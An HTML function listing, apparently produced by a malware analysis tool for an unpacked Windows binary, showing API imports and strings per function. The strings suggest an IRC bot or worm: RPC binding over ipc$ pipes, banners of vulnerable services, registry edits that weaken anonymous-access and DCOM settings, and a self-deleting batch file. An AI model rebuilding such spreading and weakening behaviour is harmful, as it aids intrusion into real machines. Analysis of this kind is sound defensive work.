"[%d]"
</font></pre></td></tr><tr id="sub_40B4AD"><td><pre><a name="sub_40B4AD"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40B4AD"><font size=+2>sub_40B4AD</a>(c3fd)</font>:<font color=brown>
" Total: %d in %s."
</font></pre></td></tr><tr id="sub_41F33C"><td><pre><a name="sub_41F33C"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41F33C"><font size=+2>sub_41F33C</a>(c6bf)</font>:<font color=darkgreen>
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_41119D"><td><pre><a name="sub_41119D"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41119D"><font size=+2>sub_41119D</a>(c6f1)</font>:<font color=darkgreen>
WS2_32.send
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_409920"><td><pre><a name="sub_409920"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_409920"><font size=+2>sub_409920</a>(c85a)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_41747C"><td><pre><a name="sub_41747C"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41747C"><font size=+2>sub_41747C</a>(c8f8)</font>:<font color=darkgreen>
KERNEL32.GetSystemInfo
KERNEL32.VirtualQueryEx
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_41AACB"><td><pre><a name="sub_41AACB"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AACB"><font size=+2>sub_41AACB</a>(c9d9)</font>:<font color=darkgreen>
KERNEL32.GetVersionExA</font>
<font color=brown></font></pre></td></tr><tr id="sub_40ABA1"><td><pre><a name="sub_40ABA1"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40ABA1"><font size=+2>sub_40ABA1</a>(cb72)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown>
"%s"
</font></pre></td></tr><tr id="sub_41CAC0"><td><pre><a name="sub_41CAC0"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41CAC0"><font size=+2>sub_41CAC0</a>(cba9)</font>:<font color=darkgreen>
NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_41E6F4"><td><pre><a name="sub_41E6F4"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41E6F4"><font size=+2>sub_41E6F4</a>(cbe8)</font>:<font color=darkgreen>
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40E3D2"><td><pre><a name="sub_40E3D2"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40E3D2"><font size=+2>sub_40E3D2</a>(cca7)</font>:<font color=darkgreen>
KERNEL32.CreateFileA
KERNEL32.CloseHandle
KERNEL32.Sleep</font>
<font color=brown>
"\\\\%s\\ipc$"
"[-] Failed to connect to host !\n"
"\\\\%s\\pipe\\browser"
"[+] Binding to RPC interface ... \n"
</font></pre></td></tr><tr id="sub_410565"><td><pre><a name="sub_410565"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_410565"><font size=+2>sub_410565</a>(cdee)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.WSAAsyncSelect
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_418330"><td><pre><a name="sub_418330"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418330"><font size=+2>sub_418330</a>(cfaf)</font>:<font color=darkgreen>
NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
"%s Error: %s <%d>."
</font></pre></td></tr><tr id="sub_412748"><td><pre><a name="sub_412748"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_412748"><font size=+2>sub_412748</a>(cfb4)</font>:<font color=brown>
"VULN sniff"
"#Bo"
"OpenSSL/0.9.6"
"Serv-U FTP Server"
"OpenSSH_2"
</font></pre></td></tr><tr id="sub_40A9E8"><td><pre><a name="sub_40A9E8"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40A9E8"><font size=+2>sub_40A9E8</a>(cfca)</font>:<font color=darkgreen>
WS2_32.inet_addr
WS2_32.gethostbyname</font>
<font color=brown></font></pre></td></tr><tr id="sub_41A36A"><td><pre><a name="sub_41A36A"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41A36A"><font size=+2>sub_41A36A</a>(d194)</font>:<font color=darkgreen>
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
KERNEL32.GetDriveTypeA</font>
<font color=brown>
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
</font></pre></td></tr><tr id="sub_4212CC"><td><pre><a name="sub_4212CC"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4212CC"><font size=+2>sub_4212CC</a>(d2f6)</font>:<font color=darkgreen>
KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_40CC86"><td><pre><a name="sub_40CC86"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40CC86"><font size=+2>sub_40CC86</a>(d5f8)</font>:<font color=darkgreen>
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_41A044"><td><pre><a name="sub_41A044"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41A044"><font size=+2>sub_41A044</a>(d7a4)</font>:<font color=darkgreen>
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey</font>
<font color=brown>
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
</font></pre></td></tr><tr id="sub_4249A2"><td><pre><a name="sub_4249A2"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4249A2"><font size=+2>sub_4249A2</a>(d8fa)</font>:<font color=darkgreen>
KERNEL32.SetUnhandledExceptionFilter</font>
<font color=brown></font></pre></td></tr><tr id="sub_4177DF"><td><pre><a name="sub_4177DF"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4177DF"><font size=+2>sub_4177DF</a>(d935)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown>
"\n"
</font></pre></td></tr><tr id="sub_41EB96"><td><pre><a name="sub_41EB96"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41EB96"><font size=+2>sub_41EB96</a>(df93)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AAF8"><td><pre><a name="sub_40AAF8"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40AAF8"><font size=+2>sub_40AAF8</a>(e076)</font>:<font color=darkgreen>
WS2_32.getsockname</font>
<font color=brown>
"%d.%d.%d.%d"
</font></pre></td></tr><tr id="sub_421AD2"><td><pre><a name="sub_421AD2"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_421AD2"><font size=+2>sub_421AD2</a>(e0a4)</font>:<font color=brown>
"KERNEL32"
"IsProcessorFeaturePresent"
</font></pre></td></tr><tr id="sub_416C90"><td><pre><a name="sub_416C90"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_416C90"><font size=+2>sub_416C90</a>(e0b0)</font>:<font color=darkgreen>
KERNEL32.GetLogicalDriveStringsA</font>
<font color=brown>
"A:\\"
</font></pre></td></tr><tr id="sub_410444"><td><pre><a name="sub_410444"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_410444"><font size=+2>sub_410444</a>(e1a1)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_41853D"><td><pre><a name="sub_41853D"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41853D"><font size=+2>sub_41853D</a>(e208)</font>:<font color=darkgreen>
KERNEL32.CreateFileA
KERNEL32.GetFileAttributesA</font>
<font color=brown>
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
"%%comspec%% /c %s %s"
</font></pre></td></tr><tr id="sub_40D83A"><td><pre><a name="sub_40D83A"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40D83A"><font size=+2>sub_40D83A</a>(e39f)</font>:<font color=darkgreen>
KERNEL32.CreateFileA
KERNEL32.ReadFile
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\browser"
</font></pre></td></tr><tr id="sub_4156F9"><td><pre><a name="sub_4156F9"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4156F9"><font size=+2>sub_4156F9</a>(e468)</font>:<font color=darkgreen>
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow</font>
<font color=brown>
"Window"
</font></pre></td></tr><tr id="sub_41AC18"><td><pre><a name="sub_41AC18"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AC18"><font size=+2>sub_41AC18</a>(e474)</font>:<font color=darkgreen>
KERNEL32.GetVersionExA
ADVAPI32.GetUserNameA
WS2_32.inet_addr
WS2_32.gethostbyaddr</font>
<font color=brown>
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2003"
"???"
"%s (%s)"
"couldn't resolve host"
"HH:mm:ss"
</font></pre></td></tr><tr id="sub_41AA78"><td><pre><a name="sub_41AA78"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AA78"><font size=+2>sub_41AA78</a>(e5dd)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown>
"%dd %dh %dm"
</font></pre></td></tr><tr id="sub_41ECDA"><td><pre><a name="sub_41ECDA"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41ECDA"><font size=+2>sub_41ECDA</a>(ea79)</font>:<font color=darkgreen>
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_418872"><td><pre><a name="sub_418872"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418872"><font size=+2>sub_418872</a>(ec5e)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_40F3DD"><td><pre><a name="sub_40F3DD"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40F3DD"><font size=+2>sub_40F3DD</a>(ed56)</font>:<font color=darkgreen>
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown></font></pre></td></tr><tr id="sub_4152AE"><td><pre><a name="sub_4152AE"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4152AE"><font size=+2>sub_4152AE</a>(edda)</font>:<font color=darkgreen>
KERNEL32.GetLocalTime</font>
<font color=brown>
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_424F86"><td><pre><a name="sub_424F86"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_424F86"><font size=+2>sub_424F86</a>(ef2b)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_41AECC"><td><pre><a name="sub_41AECC"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AECC"><font size=+2>sub_41AECC</a>(f47d)</font>:<font color=darkgreen>
WININET.InternetGetConnectedStateEx</font>
<font color=brown></font></pre></td></tr><tr id="sub_416BBE"><td><pre><a name="sub_416BBE"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_416BBE"><font size=+2>sub_416BBE</a>(f5ac)</font>:<font color=brown>
"failed"
</font></pre></td></tr><tr id="sub_40AF07"><td><pre><a name="sub_40AF07"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40AF07"><font size=+2>sub_40AF07</a>(f77f)</font>:<font color=brown>
"real"
</font></pre></td></tr><tr id="sub_417640"><td><pre><a name="sub_417640"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_417640"><font size=+2>sub_417640</a>(f82b)</font>:<font color=darkgreen>
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_417ABA"><td><pre><a name="sub_417ABA"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_417ABA"><font size=+2>sub_417ABA</a>(fa09)</font>:<font color=darkgreen>
KERNEL32.CreateThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_41B9C3"><td><pre><a name="sub_41B9C3"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41B9C3"><font size=+2>sub_41B9C3</a>(fa8f)</font>:<font color=darkgreen>
KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_41791B"><td><pre><a name="sub_41791B"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41791B"><font size=+2>sub_41791B</a>(fe0c)</font>:<font color=darkgreen>
WS2_32.send
WS2_32.recv
WS2_32.closesocket</font>
<font color=brown>
"NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
</font></pre></td></tr><tr id="sub_4260E5"><td><pre><a name="sub_4260E5"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4260E5"><font size=+2>sub_4260E5</a>(fe6c)</font>:<font color=darkgreen>
KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_40DDDF"><td><pre><a name="sub_40DDDF"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40DDDF"><font size=+2>sub_40DDDF</a>(ff7b)</font>:<font color=darkgreen>
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.setsockopt
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep</font>
<font color=brown>
""
</font></pre></td></tr><tr id="sub_41ED30"><td><pre><a name="sub_41ED30"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41ED30"><font size=+2>sub_41ED30</a>(ffe7)</font>:<font color=darkgreen>
KERNEL32.VirtualFree</font>
<font color=brown></font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html> |